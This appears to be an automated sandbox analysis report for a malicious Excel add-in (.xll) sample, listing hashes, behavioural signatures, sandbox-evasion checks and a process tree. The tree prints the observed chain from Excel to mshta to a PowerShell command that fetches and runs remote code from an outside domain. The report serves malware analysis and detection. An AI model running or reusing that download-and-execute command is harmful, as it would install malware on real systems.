Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
22/05/2024, 17:39
Static task
static1
Behavioral task
behavioral1
Sample
7754e6d6865dc9cc821a77c5e5f3cdda1de94058781f733f5562d08bcd2bd5fa.xll
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
7754e6d6865dc9cc821a77c5e5f3cdda1de94058781f733f5562d08bcd2bd5fa.xll
Resource
win11-20240508-en
General
-
Target
7754e6d6865dc9cc821a77c5e5f3cdda1de94058781f733f5562d08bcd2bd5fa.xll
-
Size
12KB
-
MD5
898d50cf0dc992f62118bd13ba32accb
-
SHA1
bd49137ef4d8411565e2adc2285a659134ce3425
-
SHA256
7754e6d6865dc9cc821a77c5e5f3cdda1de94058781f733f5562d08bcd2bd5fa
-
SHA512
7702e69a9ba2ac0862f9248a1c11189de554b19f7b91491ccf6bca856a209a57fa6ea28cdabe47ef9791280b561e97e764dca35d95269fa00d39c681ab40bb9c
-
SSDEEP
192:wL29RBzDzeobchBj8JONGON1ruurEPEjr7Ah1:e29jnbcvYJOPfuuvr7C1
Malware Config
Extracted
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2228 1296 mshta.exe 76 -
Blocklisted process makes network request 1 IoCs
flow pid Process 13 3380 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 1296 EXCEL.EXE 1296 EXCEL.EXE -
pid Process 3380 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1296 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3380 powershell.exe 3380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3380 powershell.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 1296 EXCEL.EXE 1296 EXCEL.EXE 1296 EXCEL.EXE 1296 EXCEL.EXE 1296 EXCEL.EXE 1296 EXCEL.EXE 1296 EXCEL.EXE 1296 EXCEL.EXE 1296 EXCEL.EXE 1296 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1296 wrote to memory of 2228 1296 EXCEL.EXE 78 PID 1296 wrote to memory of 2228 1296 EXCEL.EXE 78 PID 1296 wrote to memory of 2228 1296 EXCEL.EXE 78 PID 2228 wrote to memory of 3380 2228 mshta.exe 79 PID 2228 wrote to memory of 3380 2228 mshta.exe 79 PID 2228 wrote to memory of 3380 2228 mshta.exe 79
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\7754e6d6865dc9cc821a77c5e5f3cdda1de94058781f733f5562d08bcd2bd5fa.xll"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f754844cfb65838d1dd6b19dde5d835c
SHA1b3eb677783adc88c8d048898449e04d49f416db6
SHA2563644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6
SHA512f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf
-
C:\Users\Admin\AppData\Local\Temp\7754e6d6865dc9cc821a77c5e5f3cdda1de94058781f733f5562d08bcd2bd5fa.xll
Filesize12KB
MD5898d50cf0dc992f62118bd13ba32accb
SHA1bd49137ef4d8411565e2adc2285a659134ce3425
SHA2567754e6d6865dc9cc821a77c5e5f3cdda1de94058781f733f5562d08bcd2bd5fa
SHA5127702e69a9ba2ac0862f9248a1c11189de554b19f7b91491ccf6bca856a209a57fa6ea28cdabe47ef9791280b561e97e764dca35d95269fa00d39c681ab40bb9c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82